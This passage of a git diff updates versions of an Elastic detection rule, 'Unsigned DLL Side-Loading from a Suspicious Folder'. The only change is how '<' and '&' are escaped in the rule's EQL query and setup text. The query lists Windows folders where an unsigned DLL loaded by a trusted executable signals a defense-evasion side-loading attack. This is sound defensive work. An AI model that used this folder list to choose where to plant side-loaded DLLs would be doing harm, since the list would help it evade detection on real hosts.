\"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json index 59509cfb2d9..a5745611774 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json index d9d2a897273..4766d9fac3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json index 51973a6fb2d..f1f7bf93565 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n 